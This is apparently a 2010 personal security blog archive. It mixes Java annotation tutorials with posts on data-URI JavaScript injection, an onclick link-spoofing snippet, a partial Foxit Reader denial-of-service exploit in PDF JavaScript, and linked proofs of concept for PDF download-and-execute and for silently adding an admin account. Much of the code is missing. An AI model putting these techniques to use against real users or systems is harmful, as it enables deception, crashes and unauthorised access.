Monday, November 1, 2010

Java Annotations pt 2

This is my second entry about this topic. This one is a simple example how to implement a singleton pattern without have to code it, just annotate the class.

Let's make our annotation.

Just for test, we will create a simple class.

And now the brains!

Our main class goes like this.

Let's test this!



Sunday, October 31, 2010

Java Annotations

One of the coolest things that java permits to do, is add annotations on classes and methods.
This feature can extremely useful, for example build your how unit of tests or something else.

The interface is here you define or annotation.

And in your class.


Annotation class Main
name: Something
Version: This is a annotation

Uri Scheme

In this post i will cover one of the coolest features that modern browser support nowadays which is URI schemes. There is a lot of schemes out there, browser custom schemes (about:something), protocol schemes (, and of course data schemes.

In this post i only will talk about data schemes.

Data schemes are organized like this:

data:{type of the data};{encode},{data}

In the type of data you can various types of data such as:
application/javascript (text/javascript was depreced)

This types are defined in internet media types.

It's time to make some magic.
Put this in your browser:

You should se a image now!
Ok this is the thing, simple fact that you can store data in only a web page.

Now, the question is how we can make this feature useful for us?! Javascript/Html injections!

So let's test something, put this on your browser:



Now let's make this even more fun! Let's encode javascript to make this less

Javascript Encoded + base64

This things can be done all content-types available, so be creative.

Hope you have learn something!.

These sites could be useful for you for further research:

Base64 online encoder - /
XSS - /
Internet media types - /
Data URI Scheme - /
URI Scheme - /

Link Spoof

This is just a little trick to redirect a link

<a href="" onclick="this.href=''">Spoof link should go to google</a>

This link in a normal way lead us to, but this is not a normal link, it will redirect you to, this is the "this" magic.

Works on IE, Firefox, Chrome, Opera.

Hope you have learn something!

Monday, April 12, 2010

Pdf Download & Execute

The PoC consists in download a file located in rep and execute it.

Pdf Download & Execute from iamjuza on Vimeo.

Pdf Download & Execute 2 from iamjuza on Vimeo.

How to Java Threads

This paper talks about how to do threads in java (the basics, Sharing objects between threads, Thread colaboration).


Tuesday, April 6, 2010

Foxit Reader <= Denial Of Service Exploit

Ok, this is my new exploit, i found this one playing with javascript, just take a look!

Title: Foxit Reader <= Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link:
Version: All versions <= have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!


function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );




Wednesday, March 31, 2010

Adobe Reader 7-8 File Execution No Javascript

This is a vuln found by Didier Stevens (hxxp://, since his POC isn't yet finish, this is one of my own, the pdf adds a admin user account to the system (username: x ;password: x).

Tested in Adobe Reader 9.3

Download POC here!

Enjoy it!

Check it out!

Adobe Reader File Execution - Add User POC from iamjuza on Vimeo.

There is more pocs in the forge stay tuned!